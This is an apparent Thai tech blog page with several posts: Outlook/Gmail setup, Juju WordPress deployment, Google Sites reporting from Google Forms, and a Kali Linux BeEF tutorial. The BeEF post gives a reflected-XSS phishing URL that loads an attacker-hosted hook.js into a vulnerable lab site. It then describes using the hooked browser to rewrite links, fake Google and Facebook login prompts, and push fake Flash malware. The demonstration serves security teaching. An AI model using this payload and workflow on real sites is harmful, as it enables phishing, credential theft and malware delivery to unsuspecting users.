คณกรณ์ หอศิริธรรม – Page 33

วิธีการตั้งค่า Google Apps/Gmail บน Microsoft Outlook 2016

December 6, 2016 15:04

ก่อนจะตั้งค่า Microsoft Outlook 2016 ให้สามารถใช้งานกับ Google Apps/Gmail Account ได้ต้องดำเนินการตามนี้ก่อน (เพราะ Microsft Outlook 2016 ยังไม่รองรับการยืนยันตัวตนด้วย OAuth 2.0 ซึ่งมีความปลอดภัย) แบ่งเป็น 2 กรณีครับ 1. ถ้าไม่ได้ใช้ 2-Step Verification ต้องไปที่ https://myaccount.google.com/security แล้วคลิก Allow less secure apps: ให้เป็น On ครับ 2. กรณีใช้ 2-Step Verification ให้ทำการสร้าง Apps Password โดยไปที่ https://security.google.com/settings/security/apppasswords?pli=1 เลือก Mail > Windows Computer แล้วคลิก Generate จากนั้นเอารหัสผ่านที่แสดงขึ้นมาใหม่ ไปใช้งานครับ จากนั้น จึงใส่รหัสผ่านใน Outlook ครับ UPDATE: หากจะใช้ OAuth 2.0 จริงๆ ก็ทำได้ แต่ต้อง Tweak แก้ registry กันเลย ตามนี้ครับ https://blogs.technet.microsoft.com/ivfranji/authentication-enabling-modern-auth-oauth2/

Juju #02 – วิธีติดตั้ง WordPress

December 2, 2016 14:54

ในบทความนี้ จะแสดงวิธีการใช้ Juju เพื่อติดตั้ง WordPress พร้อมแสดงวิธีการเฝ้าระวังด้วย Nagios และ การ Scale Out เริ่มต้นจากคลิกที่ รูปเครื่องหมายบวก (+) สีเขียว ในช่องค้นหา พิมพ์คำว่า “wordpress” แล้วคลิก Enter จะปรากฏผลการค้นหา สิ่งนี้เรียกว่า Charm ซึ่งเป็น Image ของระบบปฏิบัติการ พร้อมทั้งการ Setup สิ่งที่เราต้องการมาให้เลย ในภาพให้คลิกที่คำว่า WordPress ด้านซ้ายมือ จากนั้น คลิก Add to canvas ต่อไป ทำซ้ำ โดยการค้นหาสิ่งต่อไปนี้ haproxy, mysql, nagios แล้วจัดระเบียบให้สวยงามตามต้องการ จากนั้น ลากเส้นเชื่อมโยงความสัมพันธ์กัน Juju จะสร้างการเชื่อมต่อต่างๆให้เองอัตโนมัติ ในภาพ จะเป็นการตั้งค่าให้ haproxy ทำหน้าที่เป็น Load Balance ให้ WordPress ซึ่งจะเกิดขึ้นอีกหลายเครื่องในอนาคต และ WordPress ก็จะเชื่อมต่อกับ MySQL นอกจากนั้น ก็มี Nagios ที่จะเฝ้าระวัง WordPress และ MySQL เมื่อลากเส้นเชื่อมโยงเสร็จแล้ว คลิก Commit Changes ด้านขวามือล่าง จากนั้นคลิกปุ่ม Deploy หลังจากนั้น Juju จะไปเรียก Image มาติดตั้ง และสร้างความสัมพันธ์ของระบบที่เราออกแบบไว้ เมื่อเสร็จแล้วจะได้ผลดังภาพ ต่อไปคลิกที่ haproxy แล้วคลิกคำว่า Expose เพื่อบอกให้ระบบนี้สามารถเข้าถึงจากภายนอกได้ ใน Expose ให้เลือก On ระบบจะแสดง IP Address ให้ ในที่นี้คือ 10.107.107.215 ซึ่งจะเข้าถึงโดยใช้ TCP Port 80 ที่ Nagios ก็เช่นกัน ให้ Expose เป็น On แล้วจะเข้าถึงได้จาก IP 10.107.107.95 จากนั้น คลิก Commit Changes ที่ IP Address 10.107.107.215 ก็จะพบการเริ่มต้นใช้งาน wordpress ทันที เริ่มจาก เลือกภาษา แล้วคลิก Continue จากนั้น ตั้ง Site Title, Username ที่จะเข้าใช้, Password, email address แล้วคลิก Install WordPress แค่นี้ก็ใช้ wordpress ได้แล้ว ที่ Nagios ก็จะสามารถใช้งานได้ที่ IP 10.107.107.95 (วิธีการเข้าใช้งาน มี Username/Password ที่กำหนดไว้แล้ว) ใน Nagios คลิก Service เพื่อเฝ้ารายละเอียดของ Service ต่างๆ ใน Nagios คลิกที่ Map เพื่อดูผังการเชื่อมต่อ เมื่อมีการใช้งานมากขึ้น ก็สามารถเพิ่มเครื่อง WordPress เพื่อให้รองรับการเชื่อมต่อจำนวนมากขึ้นได้ โดยใน Juju คลิกที่ WordPress แล้วคลิก Scale จากนั้นให้เพิ่มเครื่องไปอีก 1 เครื่อง แล้วคลิก Confirm จากนั้นคลิก Commit Changes รอสักครู่ ก็จะพบว่า ใน Nagios ก็จะเพิ่มเครื่องใหม่ในการเฝ้าระวังให้เองอัตโนมัติด้วย จะง่ายไปไหน?

Juju #01 – เริ่มต้นใช้งาน Juju

November 23, 2016 13:57

Juju [1] เป็นเครื่องมือในการการออกแบบ Service Oriented Architecture และ Application Oriented Deployment [2] ทำให้การออกแบบระบบที่ซับซ้อนและการ Scale Out ทำได้ง่ายขึ้น สามารถทำงานได้ตั้งแต่ในเครื่องคอมพิวเตอร์เครื่องเดียว ไปจนถึงการทำงานบน Private Cloud และ Public Cloud ตัวอย่างเช่น หากต้องการระบบจัดการ Big Data ด้วย Hadoop ซึ่งประกอบด้วย Server หลายเครื่อง (Link: การติดตั้ง Hadoop อย่างง่าย) เดิมจะต้องใช้เวลาอ่านคู่มือ ทำลองติดตั้ง เมื่อได้ระบบขึ้นมาแล้ว ก็จะยังไม่สามารถใช้งานได้จริงทันที อย่างเช่น ต้องการใช้ Hadoop ในการทำเรื่อง Realtime Syslog Analytics [3] ประกอบด้วย Server จำนวนมาก ดังภาพ วิธีการที่ทำให้ได้ระบบนี้มา ก็เพียงแค่ บอก Juju ว่าต้องการระบบอะไร แล้วสั่ง Deploy แล้วก็รอ หลังจากนั้นก็ทำ Port Forward ด้วยคำสั่ง [4] sudo iptables -A PREROUTING -t nat -i ens160 -p tcp –dport 9000 -j DNAT –to 10.107.107.xxx:9000 ก็จะสามารถใช้งานได้แล้ว Reference [1] https://jujucharms.com/ [2] https://jujucharms.com/docs/stable/about-juju [3] https://jujucharms.com/realtime-syslog-analytics/ [4] http://opensource.cc.psu.ac.th/Note_on_port_forwarding_to_LXD_container

วิธีใช้ Google Sites เพื่อแสดงรายงานผลการลงทะเบียนจาก Google Form

November 3, 2016 16:03

ปัจจุบันการสร้างแบบฟอร์มการรับลงทะเบียนออนไลน์สามารถทำได้ง่ายๆโดยใช้ Google Form โดยวันนี้มีโจทย์ว่า ต้องการรับลงทะเบียนผู้ที่จะร่วมเดินทาง กำหนดว่า ต้องการเดินทางกับรถบัสหมายเลขใด (มี 3 คัน) และต้องการแสดงผลทันทีว่า แต่ละคันมีจำนวนคนเท่าไหร่แล้ว และ ใครบ้างที่เดินทางไปในรถบัสคันนั้น วิธีการคือ สร้าง Google Form เพื่อทำระบบรับลงทะเบียนตามปรกติ ในส่วนของการสร้างแบบฟอร์ม ให้คลิกที่ RESPONSES แล้วคลิกที่รูป สี่เหลี่ยมสีเขียว (Google Sheets) แล้วจัดรูปแบบให้เรียบร้อย เช่นต้องการจะซ่อน Column ใดบ้าง (จะใส่สี ก็ได้นะ) เสร็จแล้ว คลิกที่ปุ่ม Share กำหนดให้ Anyone with Link “Can View” แล้วคลิก Done สร้าง Google Sites และสร้างโครงสร้าง Page ต่างๆตามต้องการ ในตัวอย่างนี้ จะสร้าง Page “รายชื่อ” เพื่อไว้ใช้แสดงผลการลงทะเบียน ว่า รถหมายเลขใด มีจำนวนกี่คนแล้ว และใครบ้าง ให้เลือก Insert > More gadgets แล้วคลิกที่ Public > Include gadget (Iframe) จากนั้น มาใส่ URL กัน ใส่ URL ตามนี้https://spreadsheets.google.com/tq?tqx=out:html&tq=select L,count(B) group by L label count(B) ‘จำนวน’&key=XXXXXXXXXXXXXXXXXX เพื่อให้แสดงผลว่า รถบัสหมายเลขใด มีจำนวนคนเท่าไหร่ โดยที่ tq เป็น Query เขียนว่า select L, count(B) group by L label count(B) ‘จำนวน’ คือการแสดงคอลัมน์ L และ นับจำนวนโดยการ count โดยจัดกลุ่มตามคอลัมน์ L นอกจากนั้นยัง label คอลัมน์ count(B) เป็นคำว่า “จำนวน” ผลที่ได้คือ และ key=XXXXXXXXXXX นั้น ให้เอาค่าจาก ต่อไปให้แสดงผลรายชื่อทั้งหมด โดยสามารถแยกรายชื่อแต่ละคัน โดย Insert > Drive > Spreadsheet แล้วเลือก Google Sheet ที่ต้องการ เมื่อดำเนินการเสร็จแล้ว ระบบก็จะสามารถแสดงผลการลงทะเบียนได้อัตโนมัติ

วิธีใช้งาน Kali Linux – BeEF – XSS Framework

October 24, 2016 12:07

จาก วิธีใช้งาน Kali Linux – OWASP Zap – Active Scan ได้แสดงให้เห็นว่า เมื่อตรวจเจอช่องโหว่ Cross Site Scripting (XSS) บนเครื่องเป้าหมาย จากที่ได้เคยบรรยายไปใน Web Hacking and Security Workshop เรื่อง วิธีตรวจสอบเว็บไซต์ที่โดน Hack #9 : วิธีการ Hack ด้วย SQL Injection และ Cross-Site Scripting ซึ่งแสดงให้เห็นว่า หากมีช่องโหว่ดังกล่าว ทำให้สามารถใส่ JavaScript ลงไปได้ ซึ่งอาจจะดูไม่น่าจะอันตรายอะไร แต่ ถ้า Hacker พบช่องโหว่ XSS (reflected) นี้บน Website ของเรา แล้วส่ง URL ที่แนบ JavaScript ไปหลอกผู้ใช้ของเรา อาจจะเป็นทาง Email ก็จะเป็นปัญหาได้ ต่อไปนี้ จะแนะนำอีกเครื่องมือหนึ่ง ที่ชื่อว่า BeEF XSS Framework ใน Kali Linux ดังวิธีการใช้งาน “เบื้องต้น” ให้เห็นอันตรายของช่องโหว่นี้ ดังนี้ เปิด Application > 08 Exploitation Tools > beef xss framework เมื่อระบบทำงานแล้ว ให้ copy Example Hook ไว้ก่อน แล้วมา Login BeEF Website โดยใส่ username/password เป็น beef/beef ต่อไป อาจจะส่ง email ไปหลอกผู้ใช้ของระบบ โดยใส่ Link เป็น http://192.168.56.101/xss/simple.php?name=<script src=”http://192.168.56.102:3000/hook.js”></script> โดยในที่นี้ 192.168.56.101 เป็น Website ที่มีช่องโหว่ XSS 192.168.56.102 เป็น BeEF Server ของ Hacker ที่เปิด port 3000 รอให้ Download hook.js ไปติดตั้ง หากผู้ใช้โดนหลอกให้คลิก จะปรากฏภาพดังนี้ เมื่อมีผู้ใช้โดนหลอกให้คลิกเรียบร้อย ทาง Hacker ที่ใช้ BeEF จะเห็นหน้าจอดังนี้ BeEF สามารถรู้รายละเอียดของ Browser ของเป้าหมายได้ ในเมนู Command สามารถทำอะไรได้หลายอย่าง เมื่อเลือก Browser > Hooked Domain > Get Page HREFs แล้วคลิก Execute จากนั้น มาดูผลงานใน Command results ก็จะเห็นว่า ใน Page ของผู้ใช้ มี Link เดิมเป็น http://xssattackexamples.com เป็นต้น จากนั้น เลือก Replace HREFs เป็น http://beefproject.com/ แล้วคลิก Execute ตรวจสอบผลงาน พบว่า Link ถูกเปลี่ยนไป 2 ตำแหน่ง ผู้ใช้จะเห็น Link เปลี่ยนไปดังภาพ สั่งให้ Pop Dialog ถามรหัสผ่านผู้ใช้ (แบบบ้านๆ) สั่งให้หลอกถาม username/password ของ Google สั่งให้หลอกถามแบบ Facebook และหลอกให้ download Flash Player แต่จริงๆแล้วเป็น Virus/Malware/Ransomware